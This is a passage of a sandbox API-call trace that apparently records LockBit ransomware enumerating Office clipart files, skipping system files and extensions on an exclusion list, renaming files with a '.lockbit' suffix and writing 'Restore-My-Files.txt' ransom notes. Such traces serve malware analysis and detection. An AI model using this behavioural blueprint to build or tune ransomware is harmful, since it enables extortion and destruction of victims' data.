dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0110.336] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0110.336] malloc (_Size=0x40068) returned 0x3ef0008 [0110.336] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=14820) returned 1 [0110.336] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.337] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0110.337] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.337] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0110.337] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0110.342] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0110.342] malloc (_Size=0xa6) returned 0x77d800 [0110.342] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0110.377] free (_Block=0x77d800) [0110.377] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0110.378] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0110.378] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0110.378] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xe6c, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01138_.WMF", cAlternateFileName="")) returned 1 [0110.379] lstrcmpiW (lpString1=".", lpString2="DD01138_.WMF") returned -1 [0110.379] lstrcmpiW (lpString1="..", lpString2="DD01138_.WMF") returned -1 [0110.379] PathFindExtensionW (pszPath="DD01138_.WMF") returned=".WMF" [0110.379] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0110.379] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0110.380] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0110.380] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0110.380] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0110.380] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0110.380] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0110.380] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0110.380] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0110.380] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0110.380] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0110.380] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0110.380] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0110.380] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0110.380] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0110.380] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0110.380] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0110.380] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0110.380] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0110.380] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0110.380] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0110.380] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0110.380] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0110.380] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0110.380] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.380] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0110.380] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0110.380] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0110.380] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0110.380] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0110.381] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0110.381] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0110.381] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0110.381] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0110.381] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0110.381] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0110.381] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0110.381] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0110.381] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0110.381] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0110.381] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0110.381] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0110.381] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.381] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0110.381] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0110.381] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0110.381] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0110.381] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01138_.WMF") returned 1 [0110.381] lstrcmpiW (lpString1="ntldr", lpString2="DD01138_.WMF") returned 1 [0110.381] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01138_.WMF") returned 1 [0110.381] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01138_.WMF") returned -1 [0110.381] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01138_.WMF") returned -1 [0110.381] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01138_.WMF") returned 1 [0110.381] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01138_.WMF") returned 1 [0110.381] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0110.381] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned=".WMF" [0110.382] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0110.382] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0110.382] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0110.382] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0110.382] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0110.382] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0110.382] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0110.382] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0110.382] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0110.382] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0110.382] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0110.382] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0110.382] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0110.382] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0110.382] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0110.382] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0110.382] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0110.382] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0110.382] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0110.382] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0110.382] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0110.382] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0110.382] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0110.382] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0110.382] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0110.382] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0110.382] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0110.383] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0110.383] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF.lockbit") returned 72 [0110.383] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01138_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0110.383] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0110.383] malloc (_Size=0x40068) returned 0x1ff1e60 [0110.384] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3692) returned 1 [0110.384] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.384] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.384] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0110.384] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.385] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.385] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0110.385] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0110.393] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0110.393] malloc (_Size=0xa6) returned 0x77d800 [0110.393] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0110.393] free (_Block=0x77d800) [0110.393] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0110.393] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0110.393] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0110.393] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xe30, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01139_.WMF", cAlternateFileName="")) returned 1 [0110.393] lstrcmpiW (lpString1=".", lpString2="DD01139_.WMF") returned -1 [0110.393] lstrcmpiW (lpString1="..", lpString2="DD01139_.WMF") returned -1 [0110.394] PathFindExtensionW (pszPath="DD01139_.WMF") returned=".WMF" [0110.394] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0110.394] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0110.394] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0110.394] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0110.394] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0110.394] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0110.394] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0110.394] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0110.394] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0110.394] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0110.394] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0110.394] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0110.394] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0110.394] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0110.395] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0110.395] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0110.395] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0110.395] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0110.395] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0110.395] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0110.395] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0110.395] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0110.395] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0110.395] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0110.395] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.395] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0110.395] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0110.395] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0110.395] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0110.395] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0110.395] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0110.395] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0110.395] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0110.395] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0110.395] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0110.395] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0110.396] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0110.396] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0110.396] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0110.396] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0110.396] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0110.396] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0110.396] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.396] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0110.396] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0110.396] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0110.396] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0110.396] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01139_.WMF") returned 1 [0110.396] lstrcmpiW (lpString1="ntldr", lpString2="DD01139_.WMF") returned 1 [0110.396] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01139_.WMF") returned 1 [0110.396] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01139_.WMF") returned -1 [0110.396] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01139_.WMF") returned -1 [0110.396] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01139_.WMF") returned 1 [0110.396] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01139_.WMF") returned 1 [0110.396] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0110.396] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned=".WMF" [0110.396] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0110.396] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0110.396] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0110.397] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0110.397] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0110.397] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0110.397] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0110.397] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0110.397] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0110.397] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0110.397] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0110.397] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0110.397] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0110.397] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0110.397] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0110.397] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0110.397] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0110.397] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0110.397] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0110.397] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0110.397] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0110.397] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0110.397] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0110.397] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0110.397] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0110.397] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0110.397] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0110.397] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0110.398] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF.lockbit") returned 72 [0110.398] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01139_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0112.153] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0112.153] malloc (_Size=0x40068) returned 0x1ff1e60 [0112.153] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3632) returned 1 [0112.153] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.153] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.153] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0112.153] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.154] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.154] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0112.154] ReadFile (in: hFile=0x340, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0112.156] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0112.156] malloc (_Size=0xa6) returned 0x77d7a8 [0112.156] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0112.157] free (_Block=0x77d7a8) [0112.157] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0112.157] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0112.157] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0112.157] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xe20, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01140_.WMF", cAlternateFileName="")) returned 1 [0112.157] lstrcmpiW (lpString1=".", lpString2="DD01140_.WMF") returned -1 [0112.157] lstrcmpiW (lpString1="..", lpString2="DD01140_.WMF") returned -1 [0112.157] PathFindExtensionW (pszPath="DD01140_.WMF") returned=".WMF" [0112.157] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0112.157] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0112.157] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0112.157] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0112.157] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0112.157] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0112.157] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0112.157] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0112.157] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0112.157] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0112.157] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0112.157] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0112.157] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0112.157] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0112.157] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0112.158] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0112.158] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0112.158] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0112.158] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0112.158] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0112.158] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0112.158] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0112.158] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0112.158] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0112.158] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.158] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0112.158] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0112.158] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0112.158] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0112.158] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0112.158] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0112.158] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0112.158] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0112.158] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0112.158] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0112.158] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0112.158] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0112.158] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0112.158] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 